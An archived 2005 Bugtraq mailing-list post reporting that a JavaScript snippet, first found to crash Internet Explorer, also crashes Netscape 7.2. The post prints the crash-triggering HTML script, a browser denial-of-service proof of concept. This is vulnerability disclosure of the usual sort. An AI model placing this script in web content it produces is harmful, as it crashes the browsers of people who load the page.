lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Fri, 21 Jan 2005 14:35:40 -0200
From: Carlos Ulver <carlos.ulver@...il.com>
To: bugtraq@...urityfocus.com
Subject: Netscape Overflow.


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello, i saw a flaw in IE that using a Javascript it could be possible
to crash the browser. Berend-Jan Wever discovered this problem, which
consist in the following script:
 
<HTML>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
  <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>

I tested on netscape 7.2 (under windows) and the samething happened.
Netscape 7.2 will crash with that script.

Thanks,
Carlos Ulver.
Http://www.debarry2.com.br/carlos
My key: http://debarry2.com.br/carlos/contato.htm
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0.2 - not licensed for commercial use: www.pgp.com

iQA/AwUBQfEuiDgovyLCKuNEEQKJWwCdG3joB1hjk5TM21Zi+Sjscarrff0AoP2z
PzLg95wCSBghgOkO0eLXTYJi
=vlob
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ